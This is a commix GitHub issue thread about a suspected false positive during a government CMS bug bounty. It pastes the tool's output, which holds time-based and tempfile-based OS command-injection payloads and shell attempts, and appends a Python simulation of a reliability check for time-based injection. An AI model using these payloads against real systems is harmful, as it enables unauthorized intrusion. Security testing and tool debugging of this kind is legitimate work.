Comments (17)
@vincentubuntu Hmm, according to the payload, I can assume that it is a false positive, which is probably due to the server's response time. I added a fix at 8e82392. Please update commix and try again.
Still the same, Sir.
[commix banner] { v0.1b-8e82392 }
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2015 Anastasios Stasinopoulos (@ancst)

(*) Checking connection to the target URL... SUCCEED
(*) Testing the file-based semiblind injection technique...
(*) Trying to upload the 'WABKLN.txt' on /var/www/... 2%
Error: It seems that you don't have permissions to write on /var/www/.
(?) Do you want to try the temporary directory (/tmp/) [Y/n] > y
(*) Trying to upload file, on temporary directory (/tmp/)...
(!) The estimated response time is 1 second.
(*) Testing the tempfile-based injection technique... SUCCEED
The (GET) 'term' parameter is vulnerable to Semiblind-based Command Injection.
(+) Type : Semiblind-based Command Injection
(+) Technique : Tempfile-Based Injection Technique
(+) Payload : || echo 'WUZZYX' > /tmp/WUZZYX.txt | [ 6 -ne $(cat "/tmp/WUZZYX.txt" | tr -d '\n' | wc -c) ] || sleep 2
(*) Retrieving the length of execution output... SUCCEED
Retrieved 3 characters.
(*) Grabbing the output from '/tmp/WUZZYX.txt', please wait... [ 100% ]
(!) The hostname is '0+.
Can it be due to a firewall?
@stasinopoulos This is time-based:
[commix banner] { v0.1b-8e82392 }

(*) Checking connection to the target URL... SUCCEED
The estimated response time is 1 second.
(*) Testing the time-based injection technique... SUCCEED
The (GET) 'term' parameter is vulnerable to Blind-based Command Injection.
(+) Type : Blind-based Command Injection
(+) Technique : Time-Based Injection Technique
(+) Payload : ; str=$(echo VNVPBT); str1=${#str}; if [ 6 -ne ${str1} ]; then sleep 0; else sleep 2; fi
(*) Retrieving the length of execution output... SUCCEED
Retrieved 3 characters.
(*) Grabbing the output, please wait... [ 100% ]
(!) The hostname is 6(7.
(?) Do you want a Pseudo-Terminal shell? [Y/n] > y
Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)
Shell > ls
(*) Retrieving the length of execution output... SUCCEED
Retrieved 9 characters.
(*) Grabbing the output, please wait... [ 100% ]
% " $
Very weird situation. The problem is that I can't reproduce the error in order to understand the reason for the failure. I would recommend (if you know that the target has Python installed) using '--alter-shell="python"'.
Actually, when I test other sites which are not vulnerable, it can't even upload to the tmp folder (returning "not acceptable"), but here on that bug bounty website we can upload to the tmp folder. Is that a conclusion that it's not a false positive?? OK, I'll test it again with --alter-shell="python".
If you want, I can give you the link, because it's still open for bug bounty.
OK, send me an email with the link. Thanks.
commix --url="http://xxx.xxx/search?term=INJECT_HERE" --technique=t --random-agent --hostname --alter-shell="python"
[commix banner] { v0.1b-8e82392 }

(*) Checking connection to the target URL... SUCCEED
The estimated response time is 1 second.
(*) Testing the time-based injection technique... SUCCEED
The (GET) 'term' parameter is vulnerable to Blind-based Command Injection.
(+) Type : Blind-based Command Injection
(+) Technique : Time-Based Injection Technique
(+) Payload : || [ 6 -ne
(*) Retrieving the length of execution output... SUCCEED
Retrieved 13 characters.
(*) Grabbing the output, please wait... [ 100% ]
(!) The hostname is !$ 3!!&5, .& .
Full link. You might know the reason for the failure.
Today they will announce no. 1 in the bug bounty; I am the only one. They asked me to "cat" out some content inside the server, which I can't perform. lol
In case you might think it's illegal, this is the bounty site's announcement:
UPDATE: The Submission deadline has been extended to 3:00 PM.
Note: The URL for SenhriHack is xxxxxx
The main aim of Senhri Security Testing Contest is to find security vulnerabilities that exist in the Government Content Management System (Senhri).
PRIZES:
First Prize – Rs 30,000 + Certificate + Trophy
Second Prize – Rs 20,000 + Certificate + Trophy
Third Prize – Rs 10,000 + Certificate + Trophy
RULES AND GUIDELINES:
The contest will be open to anyone
Individual/Team Participation
Participants should register online on the website www.diw.mizoram.gov.in
Contest closing date and last date of submission will be up to 4th July 2015 11:00AM
Evaluation will be done between 4th and 6th July 2015
Final results will be published on Digital Week website on 7th July 2015 and prizes distribution will be done on the same day.
Any kind of denial of service (DDOS) attacks will be treated as invalid.
The organizer will have the rights to reject or disqualify any entry deemed unsuitable.
Exploits reported should be accompanied by tools used and steps to reproduce the same.
Merely finding a vulnerability is not enough. Only successful exploits will be accepted as valid entry.
The security vulnerabilities should exist within the confines of the Content Management System(Senhri). Security vulnerabilities found within the server environment will not be counted.
Testing should be done only on the mentioned url (http:/xxxxx.in). Anyone found hacking or attacking other government live sites will be disqualified.
Inform me whether it's the tool's fault or the website's failure, when you're ready, Sir. Today is the last date for evaluation, so I have to inform them whether I can upload or do "cat".
The target host seems to be not vulnerable to command injection attacks. The reason for the false positive was the non-stable server response time (1-3 seconds). I added a hotfix (011a159) in order to limit that faulty behavior. Thanks @vincentubuntu for the heads up!
Thanks. Then I'll update it.
commix --url="http://xxxx/search?term=INJECT_HERE" --technique=t
[commix banner] { v0.1b-011a159 }

(*) Checking connection to the target URL... SUCCEED
The estimated response time is 2 seconds.
(*) Testing the time-based injection technique... SUCCEED
The (GET) 'term' parameter is vulnerable to Blind-based Command Injection.
(+) Type : Blind-based Command Injection
(+) Technique : Time-Based Injection Technique
(+) Payload : & sleep 0 && str=$(echo AHCSGI) && str1=${#str} && [ 6 -eq ${str1} ] && sleep 3 \
(?) Do you want a Pseudo-Terminal shell? [Y/n] > y
Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)
Shell > ls
(*) Retrieving the length of execution output... SUCCEED
Retrieved 27 characters.
(*) Grabbing the output, please wait... [ 22% ]
Still the same for time-based.
A reliability check has been added (8498f05) on the payloads used in time-based attacks. This check evaluates the injection's behavior in order to prevent false positive results.
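The two maintainer comments above (the false positive caused by a 1-3 second swing in the server's response time, and the reliability check added for time-based payloads) describe a problem every time-based blind oracle has to solve: a single "was the request slower after `sleep N`?" measurement cannot tell an injected sleep from a slow-but-honest response once the server's own jitter is as large as the sleep, and the character-by-character output extraction built on that oracle then returns garbage like the "hostnames" pasted in this thread. The Python below is an added example written for this page, not commix's own code. It simulates a target with unstable response time, shows the one-shot check firing on noise, and implements the kind of reliability check the maintainer describes: calibrate the sleep against the slowest benign response rather than the average, send a control payload whose comparison cannot hold, and repeat. The `Payload`, `simulate_target`, `naive_is_vulnerable`, `reliable_is_vulnerable` and `trial` names, the `ABCDEF` marker and the simulated 1-3 s jitter are assumptions of the example; only the payload shape (a six-character string, a length test, a sleep) is taken from the commix output pasted in the thread.

```python
"""Reliability check for a time-based blind command-injection oracle.

Added example, not commix's own code. The HTTP round-trip is replaced by a
constructed simulator so the example runs offline; a real implementation
would time an HTTP request to the target instead.
"""
from __future__ import annotations

import math
import random
from dataclasses import dataclass
from typing import Callable


@dataclass(frozen=True)
class Payload:
    shell: str      # text that would be injected into the 'term' parameter
    sleeps: bool    # True if a vulnerable target would really run the sleep
    seconds: float  # length of the sleep the payload asks for


BASELINE = Payload(shell="", sleeps=False, seconds=0.0)  # benign request, nothing injected


def build_payloads(seconds: int) -> tuple[Payload, Payload]:
    """Same shape as the thread's payloads: a 6-char string, a length test, a sleep.

    The 'true' payload's comparison holds, so a vulnerable target sleeps; the
    'false' payload is identical except its comparison cannot hold, so it must
    NOT sleep. Sending both is what separates "commands execute" from "the
    server happens to be slow right now".
    """
    true_p = Payload(f"; str=$(echo ABCDEF); [ 6 -eq ${{#str}} ] && sleep {seconds}", True, seconds)
    false_p = Payload(f"; str=$(echo ABCDEF); [ 6 -ne ${{#str}} ] && sleep {seconds}", False, seconds)
    return true_p, false_p


def simulate_target(vulnerable: bool, jitter: tuple[float, float],
                    rng: random.Random) -> Callable[[Payload], float]:
    """Constructed stand-in for timing an HTTP request; returns seconds elapsed."""
    def send(payload: Payload) -> float:
        elapsed = rng.uniform(*jitter)       # the server's own unstable response time
        if vulnerable and payload.sleeps:
            elapsed += payload.seconds       # the injected 'sleep N' really ran
        return elapsed
    return send


def naive_is_vulnerable(send: Callable[[Payload], float]) -> bool:
    """One baseline sample, one injected sample, fixed 1-second sleep.

    Against a server that jitters between 1 and 3 s this fires whenever the
    injected request lands at least 1 s slower than the single baseline,
    which needs no injection at all (one run in eight for uniform jitter).
    """
    estimate = send(BASELINE)
    true_p, _ = build_payloads(1)
    return send(true_p) >= estimate + 1


def calibrate(send: Callable[[Payload], float], samples: int = 5) -> int:
    """Choose a sleep that dominates the SLOWEST observed benign response.

    If the sleep is shorter than the server's own worst case, a slow but
    honest response is indistinguishable from a real sleep.
    """
    slowest = max(send(BASELINE) for _ in range(samples))
    return math.ceil(slowest) + 1


def reliable_is_vulnerable(send: Callable[[Payload], float], rounds: int = 3) -> bool:
    """Report injection only if, in every round, the true-branch payload exceeds
    the sleep threshold AND the false-branch control stays under it."""
    seconds = calibrate(send)
    true_p, false_p = build_payloads(seconds)
    for _ in range(rounds):
        if send(true_p) < seconds:     # the sleep did not happen: not injectable
            return False
        if send(false_p) >= seconds:   # slow even without the sleep: jitter or timeout
            return False
    return True


def trial(vulnerable: bool, seed: int, jitter=(1.0, 3.0)) -> tuple[bool, bool]:
    """Run both checks against one simulated target; returns (naive, reliable)."""
    rng = random.Random(seed)
    send = simulate_target(vulnerable, jitter, rng)
    return naive_is_vulnerable(send), reliable_is_vulnerable(send)


def false_positive_counts(trials: int = 200, jitter=(1.0, 3.0)) -> tuple[int, int]:
    """How often each check wrongly flags a NON-vulnerable jittering server."""
    naive_fp = reliable_fp = 0
    for seed in range(trials):
        naive, reliable = trial(False, seed, jitter)
        naive_fp += naive
        reliable_fp += reliable
    return naive_fp, reliable_fp


if __name__ == "__main__":
    print("false positives over 200 trials (naive, reliable):", false_positive_counts())
    print("vulnerable target detected by reliable check:", trial(True, 0)[1])
```

With the default 1-3 s jitter the naive check flags the non-vulnerable target in roughly one run in eight, while the calibrated check never does and still detects the vulnerable target in every run. Against a real host `send` would time the HTTP request; keep the control payload and the repetition, since a single slow response is exactly what produced the false positive in this thread, and note that every extra round costs at least `seconds` of wall-clock time per character once output extraction starts.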
This issue has been automatically locked since there has not been any recent activity after it was closed. Please open a new issue for related issues.